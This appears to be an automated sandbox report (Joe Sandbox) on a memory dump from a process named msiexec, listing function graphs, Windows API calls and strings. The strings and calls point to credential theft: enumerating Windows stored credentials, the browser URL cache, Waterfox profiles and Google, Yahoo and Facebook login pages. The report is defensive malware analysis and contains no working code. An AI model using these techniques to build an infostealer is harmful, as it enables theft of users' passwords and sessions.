                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                          • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                          • API String ID: 3849927982-2252543386
                                                                                          • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                          • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                          • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                          • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 563 4091b8-40921b memset call 40a6e6 call 444432 568 409520-409526 563->568 569 409221-40923b call 40b273 call 438552 563->569 573 409240-409248 569->573 574 409383-4093ab call 40b273 call 438552 573->574 575 40924e-409258 call 4251c4 573->575 587 4093b1 574->587 588 4094ff-40950b call 443d90 574->588 580 40937b-40937e call 424f26 575->580 581 40925e-409291 call 4253cf * 2 call 4253af * 2 575->581 580->574 581->580 611 409297-409299 581->611 589 4093d3-4093dd call 4251c4 587->589 588->568 597 40950d-409511 588->597 598 4093b3-4093cc call 4253cf * 2 589->598 599 4093df 589->599 597->568 601 409513-40951d call 408f2f 597->601 598->589 615 4093ce-4093d1 598->615 603 4094f7-4094fa call 424f26 599->603 601->568 603->588 611->580 613 40929f-4092a3 611->613 613->580 614 4092a9-4092ba 613->614 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->589 618 4093e4-4093fb call 4253af * 2 615->618 616->617 619 409333-409345 memcmp 617->619 620 4092e5-4092ec 617->620 618->603 628 409401-409403 618->628 619->580 623 409347-40935f memcpy 619->623 620->580 622 4092f2-409331 memcpy * 2 620->622 625 409363-409378 memcpy 622->625 623->625 625->580 628->603 629 409409-40941b memcmp 628->629 629->603 630 409421-409433 memcmp 629->630 631 4094a4-4094b6 memcmp 630->631 632 409435-40943c 630->632 631->603 634 4094b8-4094ed memcpy * 2 631->634 632->603 633 409442-4094a2 memcpy * 3 632->633 635 4094f4 633->635 634->635 635->603
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 004091E2
                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                          • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                          • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                          • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                          • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                          • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                          • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                          • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                          • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                          • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                          • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                          • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                          • String ID:
                                                                                          • API String ID: 3715365532-3916222277
                                                                                          • Opcode ID: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                          • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                          • Opcode Fuzzy Hash: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                          • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                            • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                            • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                            • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                            • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                            • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                          • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                          • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                          • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                            • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                          • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                          • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                          • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                          • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                          • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                          • String ID: bhv
                                                                                          • API String ID: 4234240956-2689659898
                                                                                          • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                          • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                          • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                          • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 692 413f4f-413f52 693 413fa5 692->693 694 413f54-413f5a call 40a804 692->694 696 413f5f-413fa4 GetProcAddress * 5 694->696 696->693
                                                                                          APIs
                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                          • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                          • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                          • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                          • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                          • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                          • API String ID: 2941347001-70141382
                                                                                          • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                          • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                          • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                          • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 697 4466f4-44670e call 446904 GetModuleHandleA 700 446710-44671b 697->700 701 44672f-446732 697->701 700->701 702 44671d-446726 700->702 703 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 701->703 705 446747-44674b 702->705 706 446728-44672d 702->706 710 4467ac-4467b7 __setusermatherr 703->710 711 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 703->711 705->701 709 44674d-44674f 705->709 706->701 708 446734-44673b 706->708 708->701 712 44673d-446745 708->712 713 446755-446758 709->713 710->711 716 446810-446819 711->716 717 44681e-446825 711->717 712->713 713->703 718 4468d8-4468dd call 44693d 716->718 719 446827-446832 717->719 720 44686c-446870 717->720 723 446834-446838 719->723 724 44683a-44683e 719->724 721 446845-44684b 720->721 722 446872-446877 720->722 728 446853-446864 GetStartupInfoW 721->728 729 44684d-446851 721->729 722->720 723->719 723->724 724->721 726 446840-446842 724->726 726->721 730 446866-44686a 728->730 731 446879-44687b 728->731 729->726 729->728 732 44687c-446894 GetModuleHandleA call 41276d 730->732 731->732 735 446896-446897 exit 732->735 736 44689d-4468d6 _cexit 732->736 735->736 736->718
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                          • String ID:
                                                                                          • API String ID: 2827331108-0
                                                                                          • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                          • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                          • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                          • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0040C298
                                                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                          • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                          • wcschr.MSVCRT ref: 0040C324
                                                                                          • wcschr.MSVCRT ref: 0040C344
                                                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                          • GetLastError.KERNEL32 ref: 0040C373
                                                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                          • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                          • String ID: visited:
                                                                                          • API String ID: 1157525455-1702587658
                                                                                          • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                          • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                          • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                          • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 763 40e175-40e1a1 call 40695d call 406b90 768 40e1a7-40e1e5 memset 763->768 769 40e299-40e2a8 call 4069a3 763->769 771 40e1e8-40e1fa call 406e8f 768->771 775 40e270-40e27d call 406b53 771->775 776 40e1fc-40e219 call 40dd50 * 2 771->776 775->771 782 40e283-40e286 775->782 776->775 787 40e21b-40e21d 776->787 783 40e291-40e294 call 40aa04 782->783 784 40e288-40e290 free 782->784 783->769 784->783 787->775 788 40e21f-40e235 call 40742e 787->788 788->775 791 40e237-40e242 call 40aae3 788->791 791->775 794 40e244-40e26b _snwprintf call 40a8d0 791->794 794->775
                                                                                          APIs
                                                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                          • memset.MSVCRT ref: 0040E1BD
                                                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                          • free.MSVCRT ref: 0040E28B
                                                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                            • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                            • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                          • _snwprintf.MSVCRT ref: 0040E257
                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                          • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                          • API String ID: 2804212203-2982631422
                                                                                          • Opcode ID: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                                                                                          • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                          • Opcode Fuzzy Hash: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                                                                                          • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                            • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                          • memset.MSVCRT ref: 0040BC75
                                                                                          • memset.MSVCRT ref: 0040BC8C
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                          • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                          • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                          • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                          • String ID:
                                                                                          • API String ID: 115830560-3916222277
                                                                                          • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                          • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                          • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                          • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                            • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                            • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                            • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                            • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                            • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                            • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                          • _wcslwr.MSVCRT ref: 0040C817
                                                                                            • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                            • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                          • wcslen.MSVCRT ref: 0040C82C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                          • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                          • API String ID: 2936932814-4196376884
                                                                                          • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                          • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                          • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                          • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 886 40bdb0-40bdce call 404363 889 40bf63-40bf6f call 40440c 886->889 890 40bdd4-40bddd 886->890 892 40bdee 890->892 893 40bddf-40bdec CredEnumerateW 890->893 894 40bdf0-40bdf2 892->894 893->894 894->889 896 40bdf8-40be18 call 40b2cc wcslen 894->896 899 40bf5d 896->899 900 40be1e-40be20 896->900 899->889 900->899 901 40be26-40be42 wcsncmp 900->901 902 40be48-40be77 call 40bd5d call 404423 901->902 903 40bf4e-40bf57 901->903 902->903 908 40be7d-40bea3 memset 902->908 903->899 903->900 909 40bea5 908->909 910 40bea7-40beea memcpy 908->910 909->910 911 40bf11-40bf2d wcschr 910->911 912 40beec-40bf06 call 40b2cc _wcsnicmp 910->912 913 40bf38-40bf48 LocalFree 911->913 914 40bf2f-40bf35 911->914 912->911 917 40bf08-40bf0e 912->917 913->903 914->913 917->911
                                                                                          APIs
                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                          • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                          • wcslen.MSVCRT ref: 0040BE06
                                                                                          • wcsncmp.MSVCRT ref: 0040BE38
                                                                                          • memset.MSVCRT ref: 0040BE91
                                                                                          • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                          • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                          • wcschr.MSVCRT ref: 0040BF24
                                                                                          • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                          • String ID:
                                                                                          • API String ID: 697348961-0
                                                                                          • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                          • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                          • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                          • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00403CBF
                                                                                          • memset.MSVCRT ref: 00403CD4
                                                                                          • memset.MSVCRT ref: 00403CE9
                                                                                          • memset.MSVCRT ref: 00403CFE
                                                                                          • memset.MSVCRT ref: 00403D13
                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                          • memset.MSVCRT ref: 00403DDA
                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                          • String ID: Waterfox$Waterfox\Profiles
                                                                                          • API String ID: 1829478387-11920434
                                                                                          • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                          • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                          • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                          • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00403E50
                                                                                          • memset.MSVCRT ref: 00403E65
                                                                                          • memset.MSVCRT ref: 00403E7A
                                                                                          • memset.MSVCRT ref: 00403E8F
                                                                                          • memset.MSVCRT ref: 00403EA4
                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
